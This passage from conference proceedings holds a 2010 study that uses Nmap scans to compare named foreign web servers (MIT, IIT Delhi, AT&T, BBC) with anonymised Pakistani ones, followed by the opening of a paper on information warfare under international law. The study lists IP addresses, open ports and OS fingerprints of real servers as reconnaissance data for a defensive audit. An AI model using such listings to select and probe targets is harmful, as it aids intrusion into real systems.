(Vorakulpipat, C 2010) Ahmad A. Abu-Musa has conducted a survey to evaluate Computerized<br />

Accounting Information Systems security controls in Saudi organizations. (Ahmad 2006) Rafael et. al<br />

have performed a survey to analyze Canadian IT security practices. Three hundred IT security<br />

specialists were the subject of the survey to evaluate the Canadian IT security practices. (Rafael<br />

2009) Australian Taxation Office conducted a review of information security practices at the Australian<br />

Tax Office, to prevent any potential breach of data. (Australian Taxation Office 2008) US<br />

Environmental Protection Agency have conducted an audit to determine whether the Office of<br />

Administration’s (OARM’s) Integrated Contract Management System (ICMS) is complying with<br />

Federal and Agency information system security requirements. (United States Environmental<br />

Protection Agency 2006)<br />

The related work shows that where other people are concerned about their already secure<br />

information systems and is working to avoid any potential attack, Pakistani organizations are not<br />

189


Muhammad Naveed<br />

putting any efforts into information security which is evident from hacking of websites of Supreme<br />

Court of Pakistan, Pakistan Navy and many others important websites.<br />

3. Experimental setup<br />

All the tests were performed from the Internet using the following system and software:<br />

Table 1: Experimental setup<br />

Computer Intel Pentium D, 3.2 Ghz processor with 2 GB RAM<br />

Operating System Fedora 12 x86_64 (64bit Operating system)<br />

Scanning Software Nmap v5.21-1.x86_64 (a free open source scanner)<br />

4. Nmap port states<br />

According to Nmap official reference guide, the port states shown by Nmap are described as follows:<br />

4.1 open<br />

“An application is actively accepting TCP connections, UDP datagrams or SCTP<br />

associations on this port. Finding these is often the primary goal of port scanning.<br />

Security-minded people know that each open port is an avenue for attack. Attackers and<br />

pen-testers want to exploit the open ports, while administrators try to close or protect<br />

them with firewalls without thwarting legitimate users. Open ports are also interesting for<br />

non-security scans because they show services available for use on the network.” (Nmap<br />

Reference Guide)<br />

4.2 closed<br />

“A closed port is accessible (it receives and responds to Nmap probe packets), but there<br />

is no application listening on it. They can be helpful in showing that a host is up on an IP<br />

address (host discovery, or ping scanning), and as part of OS detection. Because closed<br />

ports are reachable, it may be worth scanning later in case some open up.<br />

Administrators may want to consider blocking such ports with a firewall. Then they would<br />

appear in the filtered state, discussed next.” (Nmap Reference Guide)<br />

4.3 filtered<br />

“Nmap cannot determine whether the port is open because packet filtering prevents its<br />

probes from reaching the port. The filtering could be from a dedicated firewall device,<br />

router rules, or host-based firewall software. These ports frustrate attackers because<br />

they provide so little information. Sometimes they respond with ICMP error messages<br />

such as type 3 code 13 (destination unreachable: communication administratively<br />

prohibited), but filters that simply drop probes without responding are far more common.<br />

This forces Nmap to retry several times just in case the probe was dropped due to<br />

network congestion rather than filtering. This slows down the scan dramatically.” (Nmap<br />

Reference Guide)<br />

4.4 unfiltered<br />

“The unfiltered state means that a port is accessible, but Nmap is unable to determine<br />

whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets,<br />

classifies ports into this state. Scanning unfiltered ports with other scan types such as<br />

Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.”<br />

(Nmap Reference Guide)<br />

4.5 open|filtered<br />

“Nmap places ports in this state when it is unable to determine whether a port is open or<br />

filtered. This occurs for scan types in which open ports give no response. The lack of<br />

190


Muhammad Naveed<br />

response could also mean that a packet filter dropped the probe or any response it<br />

elicited. So Nmap does not know for sure whether the port is open or being filtered. The<br />

UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.” (Nmap Reference<br />

Guide)<br />

4.6 closed|filtered<br />

“This state is used when Nmap is unable to determine whether a port is closed or filtered.<br />

It is only used for the IP ID idle scan.” (Nmap Reference Guide)<br />

5. Benchmark for the analysis<br />

The study was based on the following types of organizations:<br />

Educational and Research<br />

Commercial Organization<br />

News Channels<br />

Before analysis of the webservers in Pakistan, benchmark is set for the analysis using the famous<br />

organizations, which were assumed to be secure and the scans also showed them to be secure. As<br />

the study is based on the three types of organizations, we have set benchmarks for each of them.<br />

5.1 Education and research organizations<br />

To set the benchmark for education and research organization, Massachusetts Institute of<br />

Technology (MIT) webserver was scanned using its domain address. The scanned results show the<br />

best security, which is very impressive and attests that highly skilled and information security aware<br />

people are working in the network.<br />

The MIT’s scan result shows that only opened ports are those that are used by webserver and they<br />

should be open for the web service, all other ports are blocked. The aggressive operating system<br />

scan reveals with 94% accuracy that FreeBSD operating system is running on the server.<br />

The scan results for MIT are shown in Table 2 to Table 4.<br />

Table 2: Scan details for MIT<br />

Scanned Web Server www.mit.edu (18.9.22.169)<br />

Scan Launching Time 2010-08-14 00:50 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 2935.93 seconds<br />

Raw packets sent 4150 (156.946KB)<br />

Raw packets received 483 (29.058KB)<br />

Table 3: Port scan results for MIT<br />

Port Protocol State Service<br />

80 Tcp Open http<br />

443 Tcp Open http<br />

8001 Tcp Open http (probably for MIT Radio)<br />

Table 4: Aggressive OS scan results for MIT<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

Free BSD 6.2-<br />

General FreeBSD FreeBSD 6.X 94%<br />

RELEASE<br />

Purpose<br />

To further enhance the benchmark Indian Institute of Technology at Delhi was also analyzed which<br />

also revealed that the webserver is very secure. The only ports that were found open were the ports<br />

that are used by the webserver to provide web services. All other ports that were used were either<br />

behind the firewall and were protected or they were blocked. Aggressive operating system scan<br />

191


Muhammad Naveed<br />

shows a firewall OS probably installed on the firewall of the organization with 86% accuracy. Table 5<br />

to Table 7 show the results of IIT at Delhi, India.<br />

Table 5: Scan details for ITTD<br />

Scanned Web Server www.iitd.ac.in (220.227.156.20)<br />

Scan Launching Time 2010-08-14 00:55 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 3118.12 seconds<br />

Raw packets sent 3366 (126.658KB)<br />

Raw packets received 1368 (69.263KB)<br />

Table 6: Port scan results for ITTD<br />

Port Protocol State Service<br />

80 Tcp Open http<br />

135 Tcp Filtered msrpc<br />

139 Tcp Filtered netbios-ssn<br />

443 Tcp Open http<br />

445 Tcp Filtered microsoft-ds<br />

593 Tcp Filtered http-rps-epmap<br />

1720 Tcp Filtered H.323/Q.931<br />

2100 Tcp Filtered unknown<br />

4111 Tcp Filtered unknown<br />

4444 Tcp Filtered krb524<br />

5060 Tcp Filtered sip<br />

Table 7: Aggressive OS scan results for IITD<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy<br />

of result<br />

SonicWALL Aventail EX-1500<br />

SSL VPN appliance<br />

Firewall SonicWALL Embedded No Details available 86%<br />

5.2 Commercial organizations<br />

To set the benchmark for commercial organizations, AT&T webserver was analyzed which revealed<br />

that the server is very secure based on our scans. The results shows that only the ports used for web<br />

services are open and all other ports are blocked. Aggressive operating system scan shows that<br />

Linux 2.6.9 – 2.6.30 is installed on the system. Table 8 to Table 11 show the results of scans for<br />

AT&T webserver. Table 11 show only general purpose OSs from the result because the webserver<br />

should be installed with a general purpose server OS.<br />

Table 8: Scan details for AT&T<br />

Scanned Web Server www.att.com (118.214.121.145)<br />

Scan Launching Time 2010-08-14 00:51 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 2982.98 seconds<br />

Raw packets sent 5125 (198.226KB)<br />

Raw packets received 778 (43.980KB)<br />

Table 9: Port scan result for AT&T<br />

Port Protocol State Service<br />

80 Tcp Open http<br />

443 Tcp Open https<br />

192


Muhammad Naveed<br />

Table 10: Aggressive OS scan result for AT&T (Most probable)<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

Linux 2.6.9 – 2.6.30 General Purpose Linux Linux 2.6.X 93%<br />

Table 11: Aggressive OS scan result for AT&T (Other)<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose Linux Linux 88%<br />

General Prupose Toshiba Linux 2.4.X 88%<br />

General Purpose Linux Linux 2.4.X 87%<br />

5.3 News channels<br />

To set benchmark for news channel’s webservers, we analyzed the webserver of BBC which revealed<br />

that the only open ports are those that are used to provide web services. Though the result also<br />

shows some port in Open | filtered state which means that scan was not able to determine whether<br />

the port is opened or firewalled. SNMP port was found open on the server which is used for managing<br />

the server. The web server has good security. The aggressive OS scan revealed that there is Linux<br />

2.6.9 – 2.6.18 installed on the server. Table 12 to Table 14 show the results of scans for BBC web<br />

server.<br />

Table 12: Scan details for BBC<br />

Scanned Web Server www.bbc.co.uk (212.58.244.71)<br />

Scan Launching Time 2010-08-14 01:01 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 1211.74 seconds<br />

Raw packets sent 2593 (96.057KB) |<br />

Raw packets received 3662 (191.411KB)<br />

Table 13: Port Scan result for BBC<br />

Port Protocol State Service<br />

80 Tcp Open http<br />

135 Tcp Filtered Msrpc<br />

139 Tcp Filtered Netbios-ssn<br />

443 Tcp Open http<br />

445 Tcp Filtered Microsoft-ds<br />

1720 Tcp Filtered H.232/Q.931<br />

5060 Tcp Filtered Sip<br />

53 Udp Open|filtered<br />

123 Udp Open | filtered<br />

135 Udp Filtered Msrpc<br />

136 Udp Filtered Profile<br />

137 Udp Filtered Netbios-ns<br />

Port Protocol State Service<br />

138 Udp Filtered Netbios-dgm<br />

139 Udp Filtered Netbios-ssn<br />

161 Udp Open Snmp<br />

445 Udp Filtered Microsoft-ds<br />

193


Muhammad Naveed<br />

5060 Udp Open |filtered<br />

20919 Udp Open | filtered<br />

Table 14: Aggressive OS scan results for BBC<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

Linux 2.6.9 – 2.6.18 General Purpose Linux Linux 2.6.X 93%<br />

6. Analysis of web servers of Pakistan<br />

Webservers of the most prominent organizations were analyzed. The choice of the webservers to be<br />

scanned is the organization very similar in their services and status to the web servers used to set the<br />

benchmark. The identity of the webservers in Pakistan is kept hidden because the reputation of the<br />

organization might be affected by mentioning their name. But the trend shown is very common, and<br />

one can himself scan the various webservers in Pakistan and will come to the same conclusion. Any<br />

randomly chosen organization will reveal almost the same level of security because the study<br />

analyzed the most well reputed organization, which should be first to implement security.<br />

6.1 Education and research institutions<br />

For analyzing webservers of education and research organization, webservers of reputable<br />

universities of the country were selected. Two web servers were scanned.<br />

The analysis of the first web server revealed that the web server is being used as a mail server, ftp<br />

server, DNS and database server and the ports for all of these services were opened. First of all<br />

webserver should only be used as webserver by such a large organization, and if they should be<br />

used, they should be behind the firewall. None of the port was found filtered which may means that<br />

the organization doesn’t even have a firewall installed to protect their web server. Firewall also<br />

doesn’t guarantee complete security, but it’s a first step to secure the server, intrusion detection and<br />

prevention should also be used to enhance security. But, here the case is worst, they don’t even<br />

bother to install firewall to protect their webserver or if they have installed it, they haven’t used it to<br />

protect their server. The scan also revealed that Microsoft Windows 2003 Server SP2 was installed<br />

on the server, which due to its extensive use is more vulnerable to attacks then Linux based OS. As<br />

the Table 18 shows the other possibilities (Windows XP and 2000) but one can judge that they cannot<br />

be installed on the webserver.<br />

Table 15: Scan details<br />

Scanned Web Server Hidden (because of Possible Objections)<br />

Scan Launching Time 2010-08-14 00:49 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 4214.71 seconds<br />

Raw packets sent 5090 (195.486KB)<br />

Raw packets received 191 (11.459KB)<br />

Table 16: Port scan results<br />

Port Protocol State Service<br />

20 Tcp Closed ftp-data<br />

21 Tcp Open ftp<br />

25 Tcp Open Smtp<br />

26 Tcp Open Smtp<br />

53 Tcp Open Domain<br />

80 Tcp Open http<br />

110 Tcp Open Pop3<br />

143 Tcp Open Imap<br />

443 Tcp Closed https<br />

465 Tcp Closed Smtps<br />

995 Tcp Open Pop3<br />

1038 Tcp Closed Unknown<br />

1039 Tcp Closed Unknown<br />

1434 Tcp Closed Ms-sql-m<br />

194


Muhammad Naveed<br />

2006 Tcp Open Mysql<br />

3306 Tcp Open Mysql<br />

3389 Tcp Open Microsoft-rdp<br />

Port Protocol State Service<br />

8402 Tcp Open http<br />

8443 Tcp Open http<br />

53 Udp Open Domain<br />

161 Udp Closed Snmp<br />

162 Udp Closed Snmptrap<br />

Table 17: Aggressive OS scan results (Most probable)<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of<br />

result<br />

Microsoft Windows Server<br />

2003 SP2<br />

General Purpose Microsoft Windows 2003 96%<br />

Table 18: Aggressive OS scan results (Other)<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose Microsoft Windows XP 95%<br />

General Purpose Microsoft Windows 2000 89%<br />

The second webserver scanned also revealed the worst condition of security. Ssh server working at<br />

port 26 was found to be open for Internet, which should not be open. DNS, mysql and other ports<br />

detailed in table 20 were found open which also should not be open. A lot of ports are in Open|filtered<br />

state, and the ports might be open or firewalled. So, the web server is potentially insecure and one<br />

can easily see it form the results of port scan. Aggressive OS scan reveals that Linux 2.4.28 – Linux<br />

2.4.35 is installed on their server with 97% accuracy. Other OS guesses for webserver also shows<br />

that the webserver is installed with Linux. The old Linux version can be a potential security threat. The<br />

Linux version should not be so much old because that might not provide the required security. Scan<br />

results for the institution are shown in Table 19 to Table 22.<br />

Table 19: Scan details<br />

Scanned Web Server Hidden (because of Possible Objections)<br />

Scan Launching Time 2010-08-14 00:48 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 1132.40 seconds<br />

Raw packets sent 2550 (92.637KB)<br />

Raw packets received 4548 (237.954KB)<br />

Table 20: Port scan results<br />

Port Protocol State Service<br />

26 Tcp Open Ssh<br />

53 Tcp Open Domain<br />

80 Tcp Open http<br />

111 Tcp Open Rpcbind<br />

1720 Tcp Filtered H.323/Q.931<br />

3306 Tcp Open Mysql<br />

5060 Tcp Filtered Sip<br />

8009 Tcp Open<br />

32768 Tcp Open Rpcbind<br />

53 Udp Open Domain<br />

111 Udp Open Rpcbind<br />

135 Udp Open | filtered<br />

5003 Udp Open | filtered<br />

5060 Udp Open | filtered<br />

18676 Udp Open | filtered<br />

18818 Udp Open | filtered<br />

20279 Udp Open | filtered<br />

21454 Udp Open | filtered<br />

23176 Udp Open | filtered<br />

195


Muhammad Naveed<br />

32768 Udp Open Rpcbind<br />

32769 Udp Open | filtered<br />

32772 Udp Open | filtered<br />

Port Protocol State Service<br />

48480 Udp Open | filtered<br />

54711 Udp Open | filtered<br />

57409 Udp Open | filtered<br />

63420 Udp Open | filtered<br />

Table 21: Aggressive OS scan results (most probable)<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

Linux 2.4.28 – 2.4.35 General Purpose Linux Linux 2.4.X 97%<br />

Table 22: Aggressive OS scan results (other)<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose Ubiquiti Linux 2.4.X 95%<br />

General Purpose Linux Linux 2.6.X 94%<br />

6.2 Commercial organizations<br />

For the commercial organization, the webserver scanned is of the organization providing the same<br />

services in Pakistan as AT&T provides in America. The organization have hundreds of millions of<br />

customers and was selected as this organization should be first to implement security. The scan<br />

reveals horrible results, even the telnet port is opened as well as SSH. The server is being used as<br />

ftp, telnet, ssh, mail (smtp, imap, pop3) and many other servers as shown by forth column of table 24.<br />

Many ports are found open on the server to provide the various services, although webserver is<br />

supposed to provide only web services and should not be used as any other server at least for such a<br />

big organization. The OS installed is a Prerelease version of FreeBSD, which is released to find bugs.<br />

The server should be installed with a stable OS.<br />

Table 23: Scan Details<br />

Scanned Web Server Hidden (because of Possible Objections)<br />

Scan Launching Time 2010-08-14 00:50 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 7589.54 seconds<br />

Raw packets sent 2387 (88.397KB)<br />

Raw packets received 2302 (112.940KB)<br />

Table 24: Port scan results<br />

Port Protocol State Service<br />

21 Tcp Open ftp<br />

22 Tcp Open Ssh<br />

23 Tcp Open telnet<br />

25 Tcp Open Smtp<br />

80 Tcp Open http<br />

106 Tcp Open Pop3pw<br />

110 Tcp Open Pop3<br />

143 Tcp Open Imap<br />

443 Tcp Open http<br />

587 Tcp Open Smtp<br />

993 Tcp Open Imap<br />

995 Tcp Open Pop3<br />

1720 Tcp Filtered H.323/Q.931<br />

3306 Tcp Open Mysql<br />

5060 Tcp Filtered Sip<br />

5190 Tcp Open Smtp<br />

196


Muhammad Naveed<br />

8009 Tcp Open Ajp13<br />

8080 Tcp Open http<br />

9878 Tcp Open http<br />

Port Protocol State Service<br />

514 Udp Open | filtered<br />

5060 Udp Open | filtered<br />

5632 Udp Open | filtered<br />

49169 Udp Open | filtered<br />

Table 25: Aggressive OS scan results (most probable)<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

FreeBSD6.3-<br />

PRERELEASE<br />

General<br />

Purpose<br />

Table 26: Aggressive OS scan results (other)<br />

FreeBSD FreeBSD 6.X 96%<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose FreeBSD FreeBSD 5.X 93%<br />

General Purpose FreeBSD FreeBSD 7.X 90%<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose Apple Mac OS X 10.4.X 89%<br />

General Purpose Apple Mac OS X 10.5.X 89%<br />

General Purpose FreeBSD FreeBSD 8.X 89%<br />

General Purpose FreeBSD FreeBSD 5.X 89%<br />

6.3 News channel<br />

For this type of organization, the webserver of country’s most widely seen and most trusted news<br />

channel’s webserver was scanned. The results showed that the server is being used for a lot of other<br />

services like ftp, mail, DNS and many more as can be seen from table 28. A lot of ports are found<br />

open on such a sensitive website. Aggressive OS scan also shows with 97% accuracy that Microsoft<br />

Windows Server 2003 SP2 is installed on the server which due to its extensive use is more vulnerable<br />

to attacks. The OS guesses as shown by Table 30 also shows that they cannot be installed on a<br />

server system. Results are shown in Table 27 to Table 30.<br />

Table 27: Scan results<br />

Scanned Web Server Hidden (because of Possible Objections)<br />

Scan Launching Time 2010-08-14 01:03 PKST<br />

Scan Type Slow Comprehensive Scan<br />

Scan Time 1772.15 seconds<br />

Raw packets sent 2265 (85.521KB)<br />

Raw packets received 2354 (117.486KB)<br />

Table 28: Port scan result<br />

Port Protocol State Service<br />

21 Tcp Filtered ftp<br />

25 Tcp Open Smpt<br />

53 Tcp Open Domain<br />

80 Tcp Open http<br />

110 Tcp Open Pop3<br />

135 Tcp Open Msrpc<br />

445 Tcp Open Microsoft-ds<br />

646 Tcp Filtered Ldp<br />

1026 Tcp Open Msrpc<br />

1027 Tcp Open Msrpc<br />

1248 Tcp Open Netsain<br />

1433 Tcp Open Ms-sql-s<br />

1720 Tcp Filtered H.323/Q.931<br />

3306 Tcp Open Mysql<br />

197


Muhammad Naveed<br />

3389 Tcp Open Microsoft-rdp<br />

5060 Tcp Filtered Sip<br />

8081 Tcp Open http<br />

Port Protocol State Service<br />

8402 Tcp Open http<br />

8443 Tcp Open http<br />

9999 Tcp Open http<br />

53 Udp Open Domain<br />

123 Udp Open | filtered<br />

161 Udp Open | filtered<br />

445 Udp Open | filtered<br />

500 Udp Open | filtered<br />

1028 Udp Open | filtered<br />

1434 Udp Open | filtered<br />

3456 Udp Open | filtered<br />

4500 Udp Open | filtered<br />

5060 Udp Open | filtered<br />

Table 29: Aggressive OS scan results (most probable)<br />

OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />

Microsoft Windows General Microsoft Windows 2003 97%<br />

Server 2003 SP2 Purpose<br />

Table 30: Aggressive OS scan results (other)<br />

Type Vendor OS Family OS Generation Accuracy of result<br />

General Purpose Microsoft Windows XP 91%<br />

General Purpose Microsoft Windows 2000 88%<br />

General Purpose Microsoft Windows PocketPC/CE 88%<br />

7. Conclusion and suggestions<br />

By looking at the statistics presented, it can be easily seen that the most prominent organizations of<br />

Pakistan don’t have their webservers secure. The results show the large number of ports that can be<br />

used to attack the webservers. Each of such ports is a potential venue of attack for the ill-intentioned<br />

people. The results can be compared with the benchmarks which have the best security. On the basis<br />

of these results it can be inferred that, if these wealthy and large organization don’t bother to invest<br />

the time and money in network security, the conditions for small organization will be worst. This study<br />

is intended to give just an overview of importance given to security in our region and is by no means a<br />

detailed security analysis of these webservers. Webservers are used just as an index to study the<br />

security practices because they are most easily accessible and most important resource of an<br />

organization.<br />

All of the organization having webservers or networks connected to the Internet should use the<br />

scanners like Nmap (which we have used in this study) to find the security loopholes in their networks<br />

and then try to rectify them. Every organization should have proper network security policy and it<br />

should be ensured that the network security policy is implemented well. Every effort should be done<br />

to make the network as secure as possible. Even the most secure networks are not secure today, so<br />

the insecure networks can presents a lot of difficulties and problems, which might not be apparent<br />

today but insecure networks have to pay the price in future.<br />

Pakistan is already suffering from terrorism. Thousands of people have lost their lives and billions of<br />

dollars have been spent on the war against terrorism. Cyber terrorism is one of the next avenue that<br />

terrorist can use to give a new direction to their terrorist activities. One can imagine the severe<br />

consequences if terrorists are able to exploit webserver of popular news channel. They can transmit a<br />

message about a plane crash, presence of bomb in a very busy place, announcement about attack<br />

on the country’s active enemy and lot of others that may have very adverse effects. Pakistan being a<br />

nuclear power cannot afford this in any case because that might lead to a nuclear war.<br />

References<br />

Ahmad A. Abu-Musa (2006), " Evaluating the Security Controls of CAIS in Developing Countries: The Case of<br />

Saudi Arabia," The International Journal of Digital Accounting Research, 2006, vol. 6 no. 11, pp. 25 – 64<br />

198


Muhammad Naveed<br />

Austalian Taxation Office (2008), ‘Information Security Practices Review’ V2.0, [Online] Available:<br />

http://www.ato.gov.au/content/downloads/COR138560InfoSecurity.pdf [April 2008]<br />

DawnNews (2010), ‘Govt starts securing 36 hacked websites’, [Online] Available:<br />

http://www.dawn.com/2010/11/30/forty-pakistan-government-websites-hacked.html [30 November 2010]<br />

GEO Pakistan (2010), ‘Supreme court website hacked’, [Online] Available: http://www.geo.tv/9-30-<br />

2010/72139.htm [30 September 2010]<br />

Jahanzaib Haque (2010), 'Cyber warfare: Indian hackers take down 36 govt websites', The Express Tribune,<br />

[Online] Available: http://tribune.com.pk/story/84269/cyber-warfare-indian-hackers-take-down-36-govtwebsites/<br />

[01 Dec 2010]<br />

Nmap Reference Guide, [Online] Available: http://nmap.org/book/man.html<br />

PakCert (2005), ‘Defacement Archive of hacked Pakistani Web Sites'’, Pakistan Computer Emergency Response<br />

Team [Online] Available: http://www.pakcert.org/defaced/index.html<br />

PakCert (2008), ‘Defacement Statistics (January 1999 - August 2008)'’, Pakistan Computer Emergency<br />

Response Team [Online] Available: http://www.pakcert.org/defaced/stats.html<br />

Rafael Etges, Walid Hejazi and Alan Lefort (2009), "A Study on Canadian IT Security Practices," ISACA Journal,<br />

2009, vol. 2, pp. 1 – 3 Available:http://www.isaca.org/Journal/Past-Issues/2009/Volume-<br />

2/Documents/jpdf0902-online-a-study.pdf<br />

Syed M. Amir Husain (1998), 'Pakistan needs an Information Warfare capability', Defence Journal, [Online]<br />

Available: http://www.defencejournal.com/july98/pakneeds1.htm<br />

The Express Tribune (2010), ‘36 government sites hacked by 'Indian Cyber Army'’, [Online] Available:<br />

http://tribune.com.pk/story/83967/36-government-websites-hacked-by-indian-cyber-army/ [30 November<br />

2010]<br />

Trend Micro (2009), “Data-stealing Malware on the Rise – Solutions to Keep Businesses and Consumers Safe”,<br />

[Online]<br />

Available:http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/data_stealing_malware_<br />

focus_report_-_june_2009.pdf [June 2009]<br />

United States Environmental Protection Agency – Office of Inspector General (2006), ‘Information Security<br />

Series: Security Practices' Report No. 2006-P-00010, [Online] Available:<br />

http://www.epa.gov/oig/reports/2006/20060131-2006-P-00010.pdf [31 January 2006]<br />

Vorakulpipat, C.; Siwamogsatham, S.; Pibulyarojana, K. (2010) , "Exploring information security practices in<br />

Thailand using ISM-Benchmark," Proceedings of Technology Management for Global Economic Growth<br />

(PICMET), 2010, pp.1-4, 18-22 July 2010<br />

199


International Legal Issues and Approaches Regarding<br />

Information Warfare<br />

Alexandru Nitu<br />

Romanian Intelligence Service, Bucharest, Romania<br />

alexandru.nitu@gmail.com<br />

Abstract: In present times, societies and economies increasingly rely on electronic communications, becoming<br />

more vulnerable to threats from cyberspace. At the same time, states' military and intelligence organizations are<br />

increasingly developing the capability to attack and defend computer systems. The progress of information<br />

technology makes it possible for adversaries to attack each other in new ways, inflicting new forms of damage;<br />

technological change enables cyberwarfare acts that do not fit within existing legal categories, or may reveal<br />

contradictions among existing legal principles. The paper examines the relationship between information warfare<br />

and the law, especially international law and the law of war, as it is apparent that some fundamental questions<br />

regarding this new and emerging type of security threat need to be explored. For example, what types of<br />

activities between nation states, could or should be called information warfare? What are ‘force’, ‘armed attack’,<br />

or ‘armed aggression’ - terms from the UN Charter - in the Information Age, and do they equate to information<br />

warfare? Information warfare is neither ‘armed’ in the traditional sense, nor does it necessarily involve conflict, so<br />

an important issue is if ‘war’ between states necessarily require physical violence, kinetic energy, and human<br />

casualties. A threshold question that arises from the development of information warfare techniques is thus the<br />

definitional one: has the development of information warfare technology and techniques taken information<br />

warfare out of the existing legal definition of war? Characteristics of information technology and warfare pose<br />

problems to those who would use international law to limit information warfare, and leave legal space for those<br />

who would wage such warfare. Consequently, there may be confusion over what limits may apply to the conduct<br />

of information warfare, and when information warfare attacks may be carried out. Prospects of new technological<br />

attacks pose problems for international law because law is inherently conservative. From this point of view, the<br />

paper examines how the law itself might change in response to the fast development of information technology<br />

and how will long-established legal principles such as national sovereignty and the inviolability of national borders<br />

be affected by the ability of cyberspace to transcend such concepts.<br />

Keywords: international law, information warfare, use of force, Charter of the United Nations, Geneva<br />

conventions<br />

1. Introduction<br />

Intensive development of information and communication technologies and their wide use in all<br />

spheres of human activity have accelerated post-industrial development and the building of a global<br />

information society, becoming a driving force for social development. The global information<br />

infrastructure provides unprecedented opportunities for communication among people, their<br />

socialization and access to information. Individuals, societies and states depend on the stability and<br />

reliability of the information infrastructure.<br />

Computers and computer networks have become increasingly integral to government, military, and<br />

civilian functions. They allow instant communication and provide platforms on which business and<br />

government alike can operate. Computers now control both military and civilian infrastructures,<br />

including nuclear arsenals, telecommunication networks, electrical power systems, water supplies, oil<br />

storage facilities, financial systems, and emergency services.<br />

As the worldwide explosion of information technology (IT) is changing the ways that business,<br />

government, and education are conducted, it also promises to change the way wars are waged. The<br />

development of information technology makes it possible for adversaries to attack each other in new<br />

ways and to inflict new forms of damage, and may create new targets for attack. Attackers may use<br />

international networks to damage or disrupt enemy systems, without ever physically entering the<br />

enemy's country.<br />

Information technologies enable a fundamentally new and effective means to disrupt or destroy a<br />

country's industry, its economy, social infrastructure and public administration. They have the<br />

potential to be a means of combat capable of achieving goals related to inter-state confrontation at<br />

the tactical, operational and strategic levels. Whatever the development and diffusion of information<br />

technology mean for the future of warfare, it is apparent that many of the new forms of attack that<br />

information technology enables are qualitatively different from prior forms of attack. The use of such<br />

tools as computer intrusion and computer viruses, for example, take war out of the physical, kinetic<br />

200


Alexandru Nitu<br />

world and bring it into an intangible, electronic one. Effects previously attainable only through physical<br />

destruction are now accomplished remotely with the silent means of information technology.<br />

These new ways of fighting have been labeled Information Warfare (IW). Definitions and conceptions<br />

of IW are numerous, but generally entail preserving one’s own information and information technology<br />

while exploiting, disrupting, or denying the use of an adversary’s (Shackelford 2009). In US military<br />

doctrine, IW it is part of a much larger strategic shift that was named Information Operations (IO).<br />

Information Operations involve actions taken to affect adversary information and information systems<br />

while defending one’s own information and information systems. Information Operations apply across<br />

all phases of an operation, throughout the range of military operations, and at every level of war.<br />

Information Warfare is Information Operations conducted during time of crisis or conflict, including<br />

war, to achieve or promote specific objectives over a specific adversary or adversaries (Joint Chiefs of<br />

Staff 1998).<br />

The new emerging vulnerabilities that information age generates are more likely to be exploited by<br />

opponents of developed states that cannot hope to prevail on the battlefield, or even at the<br />

negotiations table. A lesser-advantaged state hoping to seriously harm a dominant adversary must<br />

inevitably compete asymmetrically. It must seek to counter the strengths of the opponent not head-on,<br />

but rather employing unorthodox means to strike at centers of gravity.<br />

IW offers such asymmetrical benefits. In the first place, in many cases a computer network attack will<br />

either not merit a response involving the use of force, or the legality of such a response could be<br />

debatable, even if the victim is able to accurately identify the attack and its source. Thus, because of<br />

the potentially grave impact of cyber attacks on a state’s infrastructure, it can prove a high gain, low<br />

risk option for a state outclassed militarily or economically. Moreover, to the extent that an opponent is<br />

militarily and economically advantaged, it is probably technologically dependent, and, therefore,<br />

teeming with tempting targets.<br />

2. IW and the ‘use of force’ concept<br />

Several rules govern when force can be used (the jus ad bellum, which focuses on the criteria for<br />

going to war, covering issues such as right purpose, duly constituted authority, last resort) and how<br />

states can use that force in an armed conflict (the jus in bello or ‘law of war’, that creates the concept<br />

of just war-fighting, covering discrimination, proportionality, humanity etc). These rules have diverse<br />

sources, including the U.N. Charter, international humanitarian law treaties, including the 1949<br />

Geneva Conventions, as well as customary international humanitarian law. Some of these existing<br />

laws involve principles of general applicability that could encompass IW. Nevertheless, the gap<br />

between physical weaponry (whether kinetic, biological, or chemical) and IW’s virtual methods can be<br />

substantial, creating translation problems.<br />

The sort of intangible damage that IW attacks may cause is analytically different from the physical<br />

damage caused by the use of armed force in traditional warfare. The kind of destruction that bombs<br />

and bullets cause is easy to see and understand, and fits well within longstanding views of what war<br />

means. In contrast, the disruption of information systems, including the corruption or manipulation of<br />

stored or transmitted data, may cause intangible damage, such as disruption of civil society or<br />

government services. These may be more closely equivalent to activities such as economic sanctions<br />

that may be undertaken in times of peace rather than acts of aggression (Greenberg 1998).<br />

Whether or not an information warfare attack can be considered ‘use of force’ or ‘aggression’ is<br />

relevant to the fact that a forceful response can be justified as self-defense, as well as to the issue of<br />

whether a particular response would be proportionate to the original attack.<br />

Modern law on the use of force is based on the U.N. Charter. An analysis of international law and IW<br />

could begin with the prohibition of the use of force in Article 2(4): ‘All Members shall refrain in their<br />

international relations from the threat or use of force against the territorial integrity or political<br />

independence of any state, or in any other manner inconsistent with the Purposes of the United<br />

Nations’ (Charter of the United Nations, Art.2(4)). The drafters intended to prohibit all types of force,<br />

except those carried out under the aegis of the United Nations or as provided for by the Security<br />

Council, and wanted to restrict the use of force severely by sharply limiting its use to situations<br />

approved by the Security Council (Barkham 2001).<br />

201


Alexandru Nitu<br />

The fact is that neither the Charter nor any international body has defined the term ‘use of force’<br />

